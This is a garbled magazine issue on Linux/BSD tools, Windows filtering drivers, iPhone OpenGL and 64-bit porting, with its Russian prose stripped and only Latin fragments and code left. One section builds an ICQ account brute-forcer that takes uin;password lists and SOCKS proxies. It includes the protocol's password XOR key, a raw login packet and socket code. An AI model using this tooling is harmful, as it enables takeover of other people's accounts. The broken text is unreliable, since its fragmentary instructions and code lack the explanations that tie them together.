Chaos Communication Congress

, , IT-. DeepSec ,
, , .
McAfee, Intel,
.
, (Digital Security)
(TREND MICRO Inc).
, , ,
, ,
SAP.

, ,
1984 . , , - Chaos Computer
Club.
, -
, , ,
. ,
, CCC .

: 23-26
: ,
: https://deepsec.net

DreamHack

: 25-28
: , .
: http://www.dreamhack.se
- ,
. 90-,
, .
,
.
DreamHack, Chaos Constructions,

: 27-30
: ,
: http://www.ccc.de

Lanwar

: 2011
: ,
: http://www.lanwar.com
- ,
10 ( 1998 ).
. , Lanwar , ,
. ? ,

. , ( for fun), , , . ,
Lanwar, . z


UNIXOID
zobni n@gmail.com

BSD

LiveCD
BSD-

Linux BSD-
. ,
,
. ,
, BSD
, LiveCD
.
LINUX,
,


,
BSD-
.
- BSD,
. FreeBSD, NetBSD,
OpenBSD , ,
DragonFly BSD.
, .

BSD , , BSD-
,

,
. BSD,
.



BSD LiveCD.
BSD-, .
Frenzy,
FreeBSD (, ,
).
Jibbed BSDAnywhere,
NetBSD
OpenBSD. ( )
FreeBSD
PC-BSD DesktopBSD,
,
.

Frenzy
: frenzy.org.ua
(frenzy.bspu.ru)
: 1.3 (26 2010)
: FreeBSD 8.1
, -

,
Frenzy ,
BSD,
( , ][)
LiveCD

. ,
,
FreeBSD. Frenzy ,
, -,
, ,
Firefox, Opera, Chrome, XMMS,
MPlayer, Psi, Sylpheed.
Frenzy
,
5 15 .
FreeBSD,
, ACPI,

.

Frenzy,
,

INFO

info

IceWM xfe BSDAnywhere


DesktopBSD:

, (
),
..
, .
startx X-
Fluxbox, Conky
,
idesk
xxkb ( ).
, ,
. -
,
. ,
,
, .
- , FreeBSD
, Frenzy,
.
Fluxbox, ,
. ,
:
: Opera, Firefox, Chrome, Dillo, Elinks,
Lynx.
Sylpheed Mutt.
Leafpad Vim.
Psi, Irssi, CenterIM.

aircrack-ng.
VPN- openvpn, pptp-client vpnc.
trafshow, bmon, darkstat, iftop.
3proxy, stunnel
.
TOR.
telnet,
rdesktop vnc.
nmap.
nessus nikto.
wireshark ettercap.
IDS Snort.
ClamAV
ClamTK.
VirtualBox.
.

/ .
.
,
Frenzy

FrenzyConf ( frconf, ),
( ,
..),
(ADSL, LAN, VPN) , .
, Frenzy
USB-Flash.
FreeBSD, ,
.
FreeBSD , Frenzy,
, KDE, , .

BSDAnywhere
: bsdanywhere.org
: 4.6 (5 2009)
: OpenBSD 4.6
BSDAnywhere LiveCD OpenBSD.
<Enter>
. OpenBSD
- , , , ACPI,

(boot -c; disable
acpi; quit). , ,
OpenBSD. :
.
, ,
.
: .

LiveCD, GMT,
. : . DHCP-,
<Enter>, no
.
getty . LiveCD
: live root, . live
X-
IceWM . : xterm,
xfe, xfi,

2006
PC-BSD

iXsystems,



,

.
PBI- PC-BSD


FreeBSD

,



.

1.7
,

DesktopBSD,

.
20
2010


.
2009



Frenzy 1.2Lite.
,


FreeBSD.
1.2 1.3

.


DesktopBSD

Frenzy

xmms, Firefox, Thunderbird Mutt, IRC- irssi,


OpenNX VNC.
, LiveCD OpenBSD, OpenSSH OpenCVS.
LiveCD, ,
OpenBSD ,
.

PC-BSD FreeBSD

Jibbed NetBSD
: www.jibbed.org
: 5.0.1 (27 2009)
: NetBSD 5.0.1
, LiveCD
Jibbed ( ),
,
. VirtualBox
qemu, ,

. , ACPI
. ACPI , .

, ,
DHCP, X.org.
ksh .
.
startx ,
, . (,
<Ctrl+Alt+F2>, <Alt+F2>, Linux
FreeBSD), root /etc/X11/xorg.conf (, vim ).
,
Xfce.
LiveCD- . , NetBSD,
Xfce ,
AbiWord, bash zsh, emacs,
pdf- epdfview, feh,
Firefox3, IM- pidgin, -
xfmedia, rdesktop, squid, screen, joe, mc, mpg321 wget.
NetBSD , ,

.


: www.pcbsd.org
: 8.1 (20 2010)
: FreeBSD 8.1
PC-BSD FreeBSD,
BSD- , .
,
BSD Installer, PBI,
,
.
ISO- 3,5 ,
FreeBSD, KDE4
.
, splash-, X- FluxBox , - BSD Installer.
, PC-BSD
:
( ),
( -
, ), ( ), (PC-BSD
FreeBSD ) (DVD ).
(PC-BSD ,
),
, (
Jail), .
,
KDE4 .
,
, , , ,
(, , DHCP-).
,
, . KDE , PC-BSD ,
( )
.

Software Manager,
.

PC-BSD FreeBSD
Xfce Jibbed
Linux
deb- synaptic:
, ,
.

pbi,
.
/usr/local, FreeBSD,
/Programs ( Windows Mac OS X).
PC-BSD, ,
/Programs.
,
, Linux (
,
).
KDE ( )
, PC-BSD. , ,
, IP-
. -, System Manager,
,
FreeBSD. -, Services Manager,
.
FreeBSD,
.

DesktopBSD FreeBSD

: www.desktopbsd.net
: 1.7 (7 2009)
: FreeBSD 7.2
PC-BSD DesktopBSD .
,
, BSD
Installer,
KDE. , DesktopBSD
,

.
DesktopBSD ISO-,
.
FreeBSD,
<Enter>.
, , ,
<Ctrl+Alt+Backspace>
.
(live install), , PC-BSD
.

PC-BSD

Install ,
PC-BSD,
. : , , ,
( ), (
), , (
).
, .
DesktopBSD
! ,
.
. , ,
, ,
.
. BSDStats,

. BSDStats ,
BSD-, , ,
.
, . , DesktopBSD
KDE 3.5 ,
( -
).
KDE, , , , ,
.
(),
.

(
).
, ,
OpenOffice 3.1.1, Java SE 6, Amarok,
Firefox Gimp.
GRUB
.

, BSD
,

. LiveCD NetBSD OpenBSD , Frenzy, PC-BSD DesktopBSD ,
BSD ,
, Linux.z


UNIXOID
zobni n@gmail.com


UNIX
, ,
.

- .
,
,
.
,
, ,

.

,
.

Google

Google ,
,
,
- . Google
,
-



.
?
Youtube ?

.
, ,
,
.

,

, .

Google.
GoogleCL (http://code.google.com/p/googlecl/), -

Google.
,
google,
,
, , Gmail/Android
( Google), Google
Docs,
Picasa Youtube.

, .

(picasa, blogger, youtube, docs, contacts
calendar), , , .

, ,

INFO

info
Dropbox

Google
Chrome,
,

Google
( ,

).

Google Docs gmount


Picasa get, create, list, list-albums, tag, post delete,
Blogger post, tag, list delete. , , --title
Blogger Youtube,
--summary
Picasa . ,
, -
. :

1. Blogger:
$ google blogger post --blog 'Linuxoid' --title 'GoogleCL !' --tags 'linux, cli' ' GoogleCL, bla-bla, bla'

2. :
$ google calendar add ' '

3. :
$ google contacts add ' ,zobnin@gmail.com'

4. Google Docs (
,
EDITOR):

Google, , Youtube.
, Youtube youtube-dl (http://bitbucket.org/rg3/youtube-dl/wiki/Home).
, . Youtube
metacafe.com, Google Video, Photobucket, Yahoo! video, Dailymotion
.
, ,
UNIX- flv- ?

, , ( -u -p),
(-b -d HD-),
( -c). ,
man-. URL
. , ytsearch:HTC Desire, , HTC Desire.
Google Video Yahoo! video
gvsearch ybsearch.

,
Google Docs . gdocs-mountgtk Ubuntu . , :

$ google docs edit --title " "

5. Picasa ( ):
$ google picasa create --title " " \
~/photos/*.jpg

6. Youtube:
$ google youtube post --category Comedy .avi


Google- ( Gmail) ,
GoogleCL . .
GoogleCL ,

$ sudo add-apt-repository ppa:doctormo/ppa


$ sudo apt-get update
$ sudo apt-get install gdocs-mount-gtk

: Google
Docs Connection. ,
Gnome Nautilus,
KDE. ,
, google-docs-fs, :
$ sudo apt-get install google-docs-fs

: gmount gumount,
:


web-
mplayer
- Linux
video for linux (v4l), ,
, mplayer:
mplayer tv://.
.
:
$ mencoder tv:// -nosound -ovc lavc -lavcopts
vcodec=mjpeg -o video.avi
,
:
$ mplayer tv:// -tv device=/dev/video1


Gmote
$ mkdir gdocs
$ gmount @gmail.com gdocs
$ ls gdocs
$ gumount gdocs

Gmote

Dropbox

- Dropbox,
. ,
( iOS Android), ,
,
( ,

-). Dropbox ,
. Dropbox ,
-,
. ,
Dropbox
.
1. -.
Linux -
- .
, -
, ,
. Dropbox
,

,
. ~/Dropbox torrents - ,
, .
, ( , ), ,
.
2. .
KeePassX, ,
( , -


).
(Windows- KeePass),
, . ,
~/Dropbox,
.
3. Firefox. ,
Firefox ,
, (
) , ,
, , .
, , ,
, , Dropbox.
~/Dropbox:
$ mkdir ~/Dropbox/fx_profile

( XXX , ):
$ mv ~/.mozilla/firefox/XXX.default/* ~/Dropbox/fx_profile

, Firefox (XXX
):
$ ln -s ~/Dropbox/fx_profile ~/.mozilla/firefox/XXX.default

,
, (rm -rf
~/.mozilla/firefox/*.default) ,
.
4. . , ,
, Windows.
portablelinuxapps.org
,
Linux-. Dropbox,
,
.
5. Linux-. wiki.
getdropbox.com , Linux- ,
, Dropbox.
: dl.getdropbox.com/u/30722/dropbox_server.sh dl.getdropbox.com/u/30722/dropbox_client.sh. ~/Dropbox,
dropbox_server.sh, dropbox_client.sh.
(Enter Command:) ,
, .
, ,
,
, . ,
,
mc :). ,

Dropbox, .
, Dropbox
- , ,
.

X-

,
. X- , C,
,
, - , . X- ,
, ,
- ,
, ,
, X- . -

. ~/.xinitrc.
,
-X- Xnest,
X-.
:
$ sudo apt-get install xnest
$ Xnest :1 -ac

:1 X-, ( : 127.0.0.1:1). X- :0, ,


, .
-ac ,
- ( )
.
X-, Xnest ,
,
. , ,
DISPLAY Xnest (
):
$ DISPLAY=:1

X-. ,
,
. , Xephyr ( xserver-xephyr),
Xnest, :
$ Xephyr :1 -ac

awesome KDE

, UNIX ,
,
. D-BUS,
,
EWMH (NetWM), .
D-BUS EWMH,
. D-BUS ,
(
, ][ 09.2010), EWMH .

,

.
EWMH- wmctrl.
,
.
(
) , . ,
,
, . :
1. Firefox
:
$ wmctrl -a Firefox

2. google-chrome
:
$ wmctrl -R google-chrome

3. Firefox:
$ wmctrl -r Firefox -e '0,6,0,1040,708'

4. / Xterm:
$ wmctrl -r 'Xterm' -b toggle,shaded

5. Xterm 2:
$ wmctrl -r 'Xterm' -t 2

Wmctrl ,
( -


DNS- IP-

Dropbox

Wikipedia , DNS-
Wikipedia
www.commandlinefu.com.

:
#!/bin/sh
dig +short txt ${1}.wp.dg.cx

xhotkeys, xbindkeys
keytouch).

,
, ,
,

-, -
. , .
, ,
,
-
.
-.
Wi-Fi,
, ,
, ,
.
Android,
Wi-Fi (
Symbian, Windows Mobile). Remote


Control Android Market ,


-, PRemoteDroid, Unified Remote
Windows Gmote (www.gmote.org),
Linux-
. .

. (sites.google.com/site/marcsto/GmoteServerLinux2.0.0.tar.gz),
Java-. , Java Java,
:
$ sudo apt-get install openjdk-6-jre

./GmoteServer.sh ,
- (, ~/video ~/
music) , .
, , .

play, stop, pause ..
,
vlc (
).
, , ,
.

. . ;
, ,
UNIX.z

CODING
r0064 r0064@mail.ru

Windows
Filtering Platform

Windows
Filtering
Platform


Server 2008 Vista WFP,


API .
,
.

. kernel-mode,
user-mode .
fwpkclnt.sys, fwpuclnt.dll ( k
u kernel user ).
WFP
, WFP .




, :). ,
.
,
. : ,
callout.
CALLOUTS ,



. ,
.
:
(FWP_ACTION_PERMIT);
(FWP_ACTION_BLOCK);
;
;
.
(FILTERS) , ,
callout.
callout, callout
. , , ,
NAT-callout.
LAYER , (, MSDN, ).
, Microsoft (
), ,
WDK. ,
- ,
. ,
. WDK (Windows Driver Kit),
VmWare,
WinDbg. WDK,
7600.16385.0 (
, fwpkclnt.lib ntoskrnl.lib)
WFP.
, .

Coding

callout
BlInitialize.
callout
:
1) FWPMENGINEOPEN0 ;
2) FWPMTRANSACTIONBEGIN0 WFP;
3) FWPSCALLOUTREGISTER0 callout;
4) FWPMCALLOUTADD0 callout
;
5) FWPMFILTERADD0 ();
6) FWPMTRANSACTIONCOMMIT0 ( ).
, 0.
Windows 7 ,
, FwpsCalloutRegister1 ( FwpsCalloutRegister0). , ,

guidgen.exe Microsoft GUID


, 0-
.
FwpmEngineOpen0 FwpmTransactionBegin0

.
FwpsCalloutRegister0:
FwpsCalloutRegister0
NTSTATUS NTAPI FwpsCalloutRegister0(
__inout void *deviceObject,
__in const FWPS_CALLOUT0 *callout,
__out_opt UINT32 *calloutId
);

, callout ,
.
FWPS_CALLOUT0
(classifyFn)
( / (notifyFn)
(flowDeleteFn)).
,
, , .
, GUID (calloutKey).

HTTP://WWW
links

http://msdn.microsoft.com/en-us/library/aa366510(VS.85).aspx

Windows Filtering
Platform MS.
www.komodia.com/index.php?page=wfp.html

LSP-
,
WFP.

callout
FWPS_CALLOUT sCallout = {0};
sCallout.calloutKey = *calloutKey;
sCallout.classifyFn = BlClassify;
//
sCallout.notifyFn =
(FWPS_CALLOUT_NOTIFY_FN0)BlNotify;
// , /

//
status = FwpsCalloutRegister
(deviceObject, &sCallout, calloutId);


-callout (layer)
FwpmCalloutAdd0:
DWORD WINAPI FwpmCalloutAdd0(
__in HANDLE engineHandle,
__in const FWPM_CALLOUT0 *callout,
__in_opt PSECURITY_DESCRIPTOR sd,
__out_opt UINT32 *id
);
typedef struct FWPM_CALLOUT0_ {
GUID calloutKey;
FWPM_DISPLAY_DATA0 displayData; // callout
UINT32 flags;
GUID *providerKey;
FWP_BYTE_BLOB providerData;
GUID applicableLayer;
UINT32 calloutId;
} FWPM_CALLOUT0;

FWPM_CALLOUT0 applicableLayer
, callout.
FWPM_LAYER_ALE_AUTH_CONNECT_V4. v4
Ipv4,
FWPM_LAYER_ALE_AUTH_CONNECT_V6 Ipv6.
Ipv6 , Ipv4. CONNECT ,
,
! , ,
fwpmk.h WDK.
-callout
// callout
displayData.name = L"Blocker Callout";
displayData.description = L"Blocker Callout";
mCallout.calloutKey = *calloutKey;
mCallout.displayData = displayData;
// callout
//FWPM_LAYER_ALE_AUTH_CONNECT_V4
mCallout.applicableLayer = *layerKey;
status = FwpmCalloutAdd(
gEngineHandle,
&mCallout,NULL,NULL);

, , callout , , ,
callout, .


FwpmFilterAdd0,
FWPM_FILTER0.
FWPM_FILTER0 FWPM_FILTER_CONDITION0 ( numFilterConditions).
layerKey GUID (layer),
. FWPM_LAYER_ALE_AUTH_CONNECT_V4.
FWPM_FILTER_CONDITION0. -, fieldKey ,
, , , - .
FWPM_CONDITION_IP_REMOTE_ADDRESS
, IP-. fieldKey ,
FWP_CONDITION_VALUE,
FWPM_FILTER_CONDITION0.
ipv4-. . matchType ,
FWP_CONDITION_VALUE , . :
FWP_MATCH_EQUAL, -


filter.flags = FWPM_FILTER_FLAG_NONE;
filter.layerKey = *layerKey;
filter.displayData.name = L"Blocker Callout";
filter.displayData.description =
L"Blocker Callout";
filter.action.type = FWP_ACTION_CALLOUT_UNKNOWN;
filter.action.calloutKey = *calloutKey;
filter.filterCondition = filterConditions;
//
filter.numFilterConditions = 1;
//filter.subLayerKey = FWPM_SUBLAYER_UNIVERSAL;
filter.weight.type = FWP_EMPTY; // auto-weight.
//
filterConditions[0].fieldKey =
FWPM_CONDITION_IP_REMOTE_ADDRESS;
filterConditions[0].matchType = FWP_MATCH_EQUAL;
filterConditions[0].conditionValue.type =
FWP_UINT32;
filterConditions[0].conditionValue.uint32 =
ntohl(BLOCKED_IP_ADDRESS);
//
status = FwpmFilterAdd(
gEngineHandle,
&filter,
NULL,
NULL);



run

, FWP_MATCH_NOT_EQUAL, , ,
(, ).
FWP_MATCH_GREATER, FWP_MATCH_LESS (. FWP_MATCH_TYPE). FWP_MATCH_EQUAL.
IP-. , -
, callout.
, ,
.
, , . ,
(FWPM_CONDITION_IP_REMOTE_PORT
FWPM_CONDITION_IP_LOCAL_PORT ). . ! , ,
. , .
, .
(BLOCKED_IP_ADDRESS), FWP_ACTION_BLOCK:
classify-
void BlClassify(
const FWPS_INCOMING_VALUES* inFixedValues,
const FWPS_INCOMING_METADATA_VALUES* inMetaValues,
VOID* packet, IN const FWPS_FILTER* filter,
UINT64 flowContext, FWPS_CLASSIFY_OUT* classifyOut)
{
// FWPS_CLASSIFY_OUT0
if (classifyOut) {
// block the connection
classifyOut->actionType = FWP_ACTION_BLOCK;
// clear FWPS_RIGHT_ACTION_WRITE so that lower-weight filters cannot override the verdict
classifyOut->rights &= ~FWPS_RIGHT_ACTION_WRITE;
}
}

FWP_ACTION_PERMIT, FWP_ACTION_CONTINUE .
callout (, ,
callout ? , BSOD). FwpsCalloutUnregisterById.
32- callout, FwpsCalloutRegister.
callout
NTSTATUS BlUninitialize(){
// initialised, otherwise an unregistered callout returns garbage
NTSTATUS ns = STATUS_SUCCESS;
if(gEngineHandle){
FwpmEngineClose(gEngineHandle);
}
if(gBlCalloutIdV4){
ns = FwpsCalloutUnregisterById(gBlCalloutIdV4);
}
return ns;
}

. ,
WFP- ,
MS API. ,
,
! , wdk msnmntr (
MSN Messenger-)
kernel-mode .

GUID

callout .
, GUID (Globally Unique Identifier), guidgen.exe, Visual Studio. (VS_Path)\Common7\Tools. ,
GUID 128 , 2^128 .

Windbg+VmWare.
(
Vista), WinDbg. WinXP
boot.ini, Vista+ bcdedit. , :
BCDedit /dbgsettings SERIAL DEBUGPORT:1 BAUDRATE:115200
BCDedit /debug ON ( BCDedit /set debug ON)


(. ).
! :
start windbg -b -k com:pipe,port=\\.\pipe\com_1,resets=0

windbg (. ).

, WFP . ,
:).z


CODING
RankoR ax-soft.ru

DVD

, ,
-,
, -,
:)

, ?



2008 ,
OstWay, SRQ Brute ICQ
( ICQ) .
ICQ. , ,
.

, ,
? , .
, SOCKS-,
. :
1. , - IP IPv4 , NAT,
, , . ;
2. 99% ,
, .
, ?, . ,
.
? (SOCKS4/5 HTTP(s)), , .
- ,
uin;password,

, , , .
, . .


C++ WinSock ( MS Visual


C++ 2008 Express; , ),
C++ Qt,
, + ,

?

ICQ

ICQ?
( ,
, ), :
( : , )
1. ICQ;
2. Hello-. 0x2a (
ICQ);
3. ( UIN,
, , ..);
4.
.
, .
0x2a, ,

. , , SRV_COOKIE,
BOS-, , ,
.
. ,
( 0x04,
CLOSE_CONNECTION).
OSCAR
, , :
TLV Type, Length, Value
. 0x02 + 0x02 + BLOB .
,
(uint16), .
SNAC Simple Network Atomic Communication, family , type
, , requestId (
, 0x00) ,
, .
FLAP ,
. FLAP
, 0x2a, (0x01
, 0x02 , 0x03 ( ), 0x04
, 0x05 (KeepAlive)).
sequence
, .
, ,
, .
, CLI_IDENT:
TLV 0x0001 UIN
TLV 0x0002
XOR
"\xf3\x26\x81\xc4\x39\x86\xdb\x92\x71\xa3\xb9\xe6\x53\x7a\x95\x7c"
TLV 0x0003 ClientID , . ICQ Client AIM
TLV 0x0016 ,
TLV 0x0017, 0x0018, 0x0019, 0x001A, 0x0014
,
TLV 0x000E, 0x000F . (us, en
ru, ru, )

(
),
, , ,
!
TCP
( , ICQ).
, ,
:
class Socket {
public:
bool connectToHost(const char *hostName, int port);
bool sendData(const char *buff, int length);
bool receiveData(char *buff, int length);
int bytesAvailable();
void disconnectFromHost()
{
closesocket(sock);
}
private:
SOCKET sock;
};


-.
ICQ- ,
ICQ-:
if(!sock.connectToHost("login.icq.com",
5190))
return false;

HTTP://WWW
links
oscar.asechka.ru
OSCAR
.

WARNING
warning
.

char buff[16];
memset(buff, 0, 16);
sock.receiveData(buff, 10);
if ( buff[0] != 0x2A )
{
sock.disconnectFromHost();
return false;
}
return true;

, ,
, ?
if ( ! sock.connectToHost("login.icq.com",
5190))
return false;
if ( ! bruteSock.sendData(
"\xD\xE\xA\xD\xB\xE\xE\xF", 8) )
{
bruteSock.disconnectFromHost();
return false;
}
char data[8];
if ( ! bruteSock.receiveData(data, 8) ||
memcmp(data, "\xF\xE\xE\xB\xD\xA\xE\xD", 8))
{
bruteSock.disconnectFromHost();
return false;
}
return true;

UIN
.
memset(uin, 0x00, UIN_LENGTH);
memset(pass, 0x00, PASS_LENGTH);
/* Receive uin & pass */
bruteSock.receiveData(uin, 9);
bruteSock.receiveData(pass, 8);
.............


CLI_IDENT ,
, ICQMenace ,
UIN Password, .
, C-style
:).
, , :

ICQMenace v0.9
const char loginData[] = "\x00\x1c\xf0\x21\xcf
\x4a\x00\x1f\xc6\xbd\x83\xdc\x08\x00\x45\x00"
"\x00\x87\x3a\xd4\x40\x00\x80\x06\xec\x16\x0a
\x96\x00\x08\xcd\xbc"
"\xfb\x2b\x07\x48\x14\x46\xa6\xdd\x20\x4c\xa5
\x9e\x57\xa1\x50\x18"
"\xff\xf5\x64\xd3\x00\x00\x2a\x01\x50\x31\x00
\x59\x00\x00\x00\x01"
"\x00\x01\x00%d%sx00\x02\x00%d"
"%s\x00\x03\x00\x0a\x49\x43\x51\x20\x43\x6c
\x69"
"\x65\x6e\x74\x00\x16\x00\x02\x01\x0a\x00\x17
\x00\x02\x00\x06\x00"
"\x18\x00\x02\x00\x05\x00\x19\x00\x02\x00\x00
\x00\x1a\x00\x02\x00"
"\x68\x00\x14\x00\x04\x00\x00\x75\x37\x00\x0f
\x00\x02\x65\x6e\x00"
"\x0e\x00\x02\x75\x73";

ICQ-, ,
, , , 0 , 1 , 2 .

Qt. Qt
TCP- QTcpServer. ,
:
bool listen(const QHostAddress &address = QHostAddress::Any, quint16 port = 0)

.
(QHostAddress::Any) .
, :
void QTcpServer::newConnection () [signal]

,

QTcpSocket * QTcpServer::nextPendingConnection ()

,
.
(), , :
QTcpSocket *socket = server->nextPendingConnection();
if ( socket == NULL ) {
// Shaitan!!!111
return;
}
socket->write(QByteArray::fromHex("DEADBEEF"));
socket->waitForReadyRead();
if ( socket->readAll() != QByteArray::fromHex("FEEBDAED") ) {
// Error
} else {
// success
}
socket->disconnectFromHost();
socket->waitForDisconnected();
delete socket;

. :
bool QAbstractSocket::waitForReadyRead (
int msecs = 30000 )


, ,
, msecs ( ). ,
, ,
waitForDisconnected(),
.
QtNetwork .pro.
:
QT += network

, , !
?
1. CLI_IDENT;
2. ;
3. - ,
, .
, ICQ- (CONNECTION_CLOSE). ,
UDP- -
-
( ,
:)).
QUdpSocket. ,
ICQ-;
. z

CODING
Fagot salieff@mail.ru

DVD

OpenGL
iPhone

3D-
iPhone SDK

iPhone,
UIKit, Core Graphics Cocoa
Touch, Objective-C .
, Mac OS X,
. - OpenGL ES,
OpenGL
.

, Apple
, iPhone SDK
Mac OS X. , GCC ARM v6 LLVM, .
, , , Mac OS X.
, .
, OSX86,
Mac OS X PC
( )
hackintosh. , , ,
,
SSE3, XNU/Voodoo
.
, , xCode , IDE
GCC. iPhone SDK, Apple
( ,
, ).
- , ,
.



GLES-

, , xCode , , , . ,
IDE , GLES,
. Project New Project iPhone OS Application
OpenGL ES Application Choose ,
.
. , render
ESRenderer, ,

.
AppDelegate, /
/ .
GLES EAGLView,
OpenGL-, , .

ESRenderer, . , , .

xCode IDE
glMatrixMode(GL_PROJECTION);
glEnable(GL_DEPTH_TEST);
glEnable(GL_CULL_FACE);
glFrustumf(...);
glViewport(0, 0, backingWidth,
backingHeight);


.
ESRenderer.h, ES2Renderer.m/h
Shaders,
. ES1Renderer
NSObject, ESRenderer
. EAGLView::initWithCoder
: renderer
= [[ES1Renderer alloc] init].
, . , ,
Objective-C - C++. , .
.m
.mm Objective-C
C++ ,
Cube.mm Cube.h
:
class GLCube {
public :
static GLCube * getInstance();
static void destroyInstance();
void render();
private :
GLCube();
~GLCube();
static GLCube *_internal_instance;
};

ES1Renderer::render.
,
. OpenGL, , , 3D, Z- . 60-
glFrustumf :

C++ :
GLCube::getInstance()->render();

, , .


. , ES
glBegin/glEnd,
; ,
, .
ES
.
, GLCube::render 72
12 (3 4
):
static const GLfloat verts[] = {...};
glClear(
GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT);
glLoadIdentity();
glTranslatef(0.0f,0.0f,-4.0f);
glEnableClientState(GL_VERTEX_ARRAY);
// six faces, four vertices of three floats each
for (size_t i=0; i<6; ++i)
{
glVertexPointer(3, GL_FLOAT, 0, verts+i*12);
glDrawArrays(GL_TRIANGLE_FAN, 0, 4);
}

HTTP://WWW
links

www.insanelymac.com, www.applelife.ru, www.projectosx.com

.
developer.apple.com/iphone
.

WARNING
warning

AppStore-,

.

,
.
, . ,



OpenGL. ES1Renderer::render
, OpenGL-, .
:
glEnable(GL_LIGHTING);
glEnable(GL_LIGHT0);

(
):
glMaterialfv(GL_FRONT_AND_BACK,
GL_AMBIENT, matAmbient);
glMaterialfv(GL_FRONT_AND_BACK,
GL_DIFFUSE, matDiffuse);
glMaterialfv(GL_FRONT_AND_BACK,
GL_SPECULAR, matSpecular);
glMaterialf(GL_FRONT_AND_BACK,
GL_SHININESS, lightShininess);


:
glLightfv(GL_LIGHT0, GL_AMBIENT, lightAmbient);
glLightfv(GL_LIGHT0, GL_DIFFUSE, lightDiffuse);
glLightfv(GL_LIGHT0, GL_POSITION, lightPosition);

, ,
:
glShadeModel(GL_FLAT);

,
.

,
. . OpenGL
.
. , UIImage iPhone SDK.
,
256x256 (
OpenGL-) . GLCube GLCube::loadTexture(const char *tex_name),
.

UIImage, :
NSString* nsTexName = [[NSBundle mainBundle]
pathForResource: [NSString stringWithUTF8String:
tex_name] ofType:nil];
UIImage* uiImage = [UIImage imageWithContentsOfFile:
nsTexName];
CGImageRef spriteImage = uiImage.CGImage;

CG*
CoreGraphics. CoreGraphics Framework
,
, .
iPhone SDK,
Frameworks .
,
. RGBA, ,
4:

int tex_width = CGImageGetWidth(spriteImage);
int tex_height = CGImageGetHeight(spriteImage);
GLubyte *spriteData = (GLubyte *) malloc(tex_width *
tex_height * 4);

.
,
,
UIImage . , :
CGContextRef spriteContext = CGBitmapContextCreate(spriteData,
tex_width, tex_height, 8, tex_width * 4,
CGImageGetColorSpace(spriteImage), kCGImageAlphaPremultipliedLast);
UIGraphicsPushContext(spriteContext);
[uiImage drawInRect:CGRectMake(0, 0, tex_width, tex_height)];
UIGraphicsPopContext();
CGContextRelease(spriteContext);

spriteData OpenGL-

GLCube::tex_id .
.
ES1Renderer::render OpenGL-:
glEnable(GL_TEXTURE_2D);



, (
). GLCube::render:
static const GLfloat texCoords[] = {...};
...
glBindTexture(GL_TEXTURE_2D, tex_id);
glEnableClientState(GL_TEXTURE_COORD_ARRAY);
...
glTexCoordPointer(2, GL_FLOAT, 0, texCoords + i*8);

,
, id tech 4.
, , ,
. GLCube
ang_x ang_y, incrementAngles.
, render, :
glRotatef(ang_x, 0.0f, 1.0f, 0.0f);
glRotatef(ang_y, 1.0f, 0.0f, 0.0f);

.
UIView,
EAGLView, EAGLView.mm .
:
- (void)touchesBegan:(NSSet*)touches
withEvent:(UIEvent*)event {
for (UITouch *touch in touches) {
last_touch_x = [touch locationInView:self].x;
last_touch_y = [touch locationInView:self].y;
}
}


,
:

- (void)touchesMoved:(NSSet*)touches
withEvent:(UIEvent*)event {
for (UITouch *touch in touches) {
int delta_x =
[touch locationInView:self].x - last_touch_x;
int delta_y =
[touch locationInView:self].y - last_touch_y;
GLCube::getInstance()->incrementAngles(
180.0f*delta_x/320.0f, 180.0f*delta_y/480.0f);
last_touch_x = [touch locationInView:self].x;
last_touch_y = [touch locationInView:self].y;
}
}

:
- (void)touchesEnded:(NSSet*)touches
withEvent:(UIEvent*)event { [self
touchesMoved:touches withEvent:event]; }
- (void)touchesCancelled:(NSSet*)
touches withEvent:(UIEvent*)event { [self
touchesMoved:touches withEvent:event]; }

,
,
iPhone.

Tips & Tricks

,
, .
1. Default.png 320x480
.
splash-screen, ;
2. Icon.png 57x57
. Resources *.plist, , Icon file Icon.png.
;
3. Status bar is
initially hidden . .
. ! .z


CODING
deeonis deeonis@gmail.com

64-

. ,
. 2 . 64- ,
. , . , 32- .

, 64-.
64- IA64 Intel 64 ( AMD64/x86-64/
x64). Intel Hewlett
Packard Itanium Itanium
2. x86
.
x86-64 , IA64.
x64 64- ,
,
, 32- .
64 , Microsoft
Windows XP.
WoW64 (Windows-on-Windows 64),
32-
64- ,
64- , , x86.
Intel 64,

32- 64-.
x64 16
,
16 . ,
. , Windows 7 Home
Basic 8 , Windows 7 Ultimate
192 .
, 64-,
, x64 .

, Visual Studio 6.
CSampleApp, CWinApp.
WinHelp, . :


WinHelp
class CWinApp
{
virtual void WinHelp(DWORD dwData, UINT nCmd);
};
class CSampleApp: public CWinApp
{
virtual void WinHelp(DWORD dwData, UINT nCmd);
};

Visual Studio 2005,


WinHelp CWinApp .
DWORD_PTR,
DWORD.

class CWinApp
{
// the parameter type is now DWORD_PTR
virtual void WinHelp(DWORD_PTR dwData, UINT nCmd);
};
class CSampleApp: public CWinApp
{
// still DWORD: on x64 this no longer overrides CWinApp::WinHelp
virtual void WinHelp(DWORD dwData, UINT nCmd);
};

,
32-,
x64-,
WinHelp. , 64- DWORD
DWORD_PTR,
, , .
,
MFC, .
.

64-

. , 32-
64- , , ,
size_t, . :

static void NumOfBits(const unsigned __int32 &)
{
printf("32-bit\n");
}
static void NumOfBits(const unsigned __int64 &)
{
printf("64-bit\n");
}

, x86-, , x64 .
. . , , .
, ,
. ,
32- , 64
.

class MyStack {
...
public:
void Push(__int32 &);
void Push(__int64 &);
void Pop(__int32 &);
void Pop(__int64 &);
};
MyStack stack;
// x64 8
ptrdiff_t value1;
stack.Push(value1);

// 4!!!
int value2;
stack.Pop(value2);

ptrdiff_t, int.
x86 , Intel

PVS-Studio 64bit-
64 ptrdiff_t - int.
, ,
, .
,
.

32-
,
, .
x64-. ,
x86-, 64- .
, 64-
// 1
size_t ArraySize = N * 4;
intptr_t *Array = (intptr_t *)malloc(ArraySize);
// 2
size_t values[ARRAY_SIZE];
memset(values, 0, ARRAY_SIZE * 4);
// 3
size_t n, r;
n = n >> (32 - r);

,
, 4 .
32 , Intel 64
out of memory. size_t 4 ,
. , , , size_t.
,
sizeof()
<limits.h>, <inttypes.h> ..

// 1
size_t ArraySize = N * sizeof(intptr_t);
intptr_t *Array = (intptr_t *)malloc(ArraySize);
// 2
size_t values[ARRAY_SIZE];
memset(values, 0, ARRAY_SIZE * sizeof(size_t));
// 3
size_t n, r;
n = n >> (CHAR_BIT * sizeof(n) - r);

Microsoft Visual Studio 2010 64


64- const
size_t M = 0xFFFFFFF0u. 32- , , , ,
, , .
, x64 M
